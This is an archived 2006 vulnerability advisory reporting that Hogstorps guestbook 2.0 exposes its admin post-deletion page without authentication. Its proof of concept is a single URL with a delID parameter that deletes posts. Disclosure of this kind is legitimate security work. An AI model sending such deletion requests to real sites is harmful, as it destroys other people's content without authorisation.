Hogstorps guestbook 2.0 Remote Access to Admin Pannel

2006-06-01T00:00:00
ID SECURITYVULNS:DOC:12917
Type securityvulns
Reporter Securityvulns
Modified 2006-06-01T00:00:00

Description


  -  Remote Access to Admin Pannel without Authentication -

-= http://colander.altervista.org/advisory/HTGuestBook2.txt =-

       -= Hogstorps guestbook 2.0 =-

Omnipresent May 04, 2006

Vunerability(s):

Remote Access to Admin Pannel without Authentication

Product:

Hogstorps guestbook 2.0

Vendor:

http://www.hogstorp.nu

Description of product:

A free and simple guestbook.

Vulnerability / Exploit:

The application is vulnerabile to a Remote Access to Admin Pannel without Authentication. A user can delete posts, only using a simple string sent via browser.

PoC / Proof of Concept:

http://127.0.0.1/[path_of_application]/admin/radera/tabort.asp?delID=[Number_of_post]

Example: http://127.0.0.1/[path_of_application]/admin/radera/tabort.asp?delID=119

And you will receive the message:

The message is deleted, go back to guestbook!

Aspcollection from Hogstorps IF

Vendor Status

Not Informed!

Credits:

omnipresent omnipresent@email.it